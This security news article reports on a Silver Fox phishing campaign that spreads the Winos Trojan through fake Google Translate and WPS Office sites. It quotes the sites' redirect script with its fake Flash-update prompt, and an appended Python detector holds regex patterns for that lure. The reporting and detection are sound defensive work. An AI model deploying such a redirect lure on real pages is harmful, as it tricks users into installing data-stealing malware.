Silver Fox Hackers Using Weaponized Google Translate Tools to Deploy Windows Malware

A sophisticated malware campaign has emerged targeting unsuspecting users through weaponized versions of popular online tools, particularly Google Translate interfaces.

The Silver Fox threat actors have developed an intricate attack chain that leverages social engineering tactics to deliver the notorious Winos Trojan, representing a significant evolution in malware distribution techniques that exploit users’ trust in legitimate web services.

Figure: Attack chain (Source – Medium)

The attack methodology centers around creating convincing replicas of widely-used applications and websites, with attackers establishing fake Google Translate portals, currency converters, and software download pages for popular applications like WPS Office.

Figure: Fake WPS official download website (Source – Medium)

When users interact with these malicious sites, they encounter deceptive Flash update prompts that redirect them to attacker-controlled download servers hosting malicious installation packages.

Knownsec 404 team researchers identified this campaign as part of a broader Silver Fox operation that has been active since 2024, with the threat actors demonstrating remarkable adaptability in their social engineering approaches.

The researchers noted that this particular variant represents a significant departure from traditional malware distribution methods, as it specifically targets users seeking translation services and productivity tools.

Figure: Fake Easy Translation installation package (Source – Medium)

The infection mechanism reveals sophisticated technical implementation, with attackers embedding carefully crafted JavaScript code within the phishing websites.

The malicious script creates hidden input elements and attempts to fetch configuration data from remote JSON files before displaying fake Flash update notifications.

The embedded redirect script shows how the chain works:

fetch('url.json')                        // pull the redirect target from a remote JSON config file
    .then(response => response.json())
    .then(data => {
        const urlToUse = data[0];        // first entry of the config is the download URL to send the victim to
        // Any click on the page raises the fake Flash prompt; the Chinese text reads
        // "Flash version detected as too low, please install the plugin and retry!"
        document.body.addEventListener('click', function() {
            alert("检测Flash版本过低,请安装后插件重试!");
        });
        window.location.href = urlToUse; // redirect to the attacker-controlled download server
    });
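As an added illustration (not code from the article or from the Knownsec 404 researchers), the following Python heuristic scans a page's source for the combination the article describes: a fetch of a JSON config, a redirect via window.location, and an alert mentioning Flash. The regexes and the two embedded sample pages are my own constructions for demonstration.

```python
import re

# Heuristics derived from the redirect script quoted above. The regexes are my
# own assumptions for illustration, not signatures published by the researchers.
INDICATORS = [
    # fetch('<something>.json') pulling the redirect target from a config file
    ("fetch_json_config", re.compile(r"""fetch\(\s*['"][^'"]*\.json['"]\s*\)""", re.I)),
    # assignment to window.location(.href) that performs the redirect
    ("location_redirect", re.compile(r"window\.location(?:\.href)?\s*=", re.I)),
    # alert() whose text mentions Flash, i.e. the fake "Flash version too low" prompt
    ("flash_update_prompt", re.compile(r"alert\([^)]*Flash", re.I)),
    # hidden <input> elements the article says the script creates
    ("hidden_input", re.compile(r"""<input[^>]*type\s*=\s*['"]?hidden""", re.I)),
]

def find_lure_indicators(html: str) -> list[str]:
    """Return the names of all indicators found in a page's HTML/JS source."""
    return [name for name, rx in INDICATORS if rx.search(html)]

def is_suspected_lure(html: str) -> bool:
    """Flag only when the fetch -> redirect chain and the Flash prompt co-occur;
    a lone hidden input or a lone redirect is far too common to act on."""
    hits = set(find_lure_indicators(html))
    return {"fetch_json_config", "location_redirect", "flash_update_prompt"} <= hits

# Constructed sample page modelled on the quoted script (not a real capture).
LURE_PAGE = """<html><body><input type="hidden" id="cfg">
<script>
fetch('url.json').then(r => r.json()).then(data => {
    document.body.addEventListener('click', function() {
        alert("检测Flash版本过低,请安装后插件重试!");
    });
    window.location.href = data[0];
});
</script></body></html>"""

# Constructed benign page: also fetches JSON and has a hidden input, but no redirect.
BENIGN_PAGE = """<html><body><form><input type="hidden" name="csrf" value="x"></form>
<script>
fetch('/api/translate?q=hello').then(r => r.json()).then(d => {
    document.getElementById('out').textContent = d.text;
});
</script></body></html>"""

if __name__ == "__main__":
    for label, page in (("lure", LURE_PAGE), ("benign", BENIGN_PAGE)):
        print(label, find_lure_indicators(page), is_suspected_lure(page))
```

Running it reports all four indicators for the lure page and only the hidden input for the benign page, which is why the verdict requires the redirect chain and the Flash prompt together.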

Upon successful installation, the malware deploys multiple components including javaw.exe, Microsoftdata.exe, and various supporting files that establish persistent access to compromised systems.

The Winos Trojan, masquerading as legitimate Microsoft software, implements comprehensive data theft capabilities including screenshot capture, keylogging, and clipboard monitoring functionalities.

The campaign’s persistence mechanism involves registry manipulation to ensure long-term system compromise, with the malware writing itself into Windows startup locations.

Analysis reveals that the final payload contains references to “RexRat4.0.3” in its program database, indicating the use of commercially available remote access tools that have been repurposed for cybercriminal activities.

This Silver Fox campaign represents a concerning trend in malware distribution, where threat actors increasingly rely on social engineering rather than technical exploits to achieve initial compromise, making user education and awareness crucial components of organizational cybersecurity strategies.
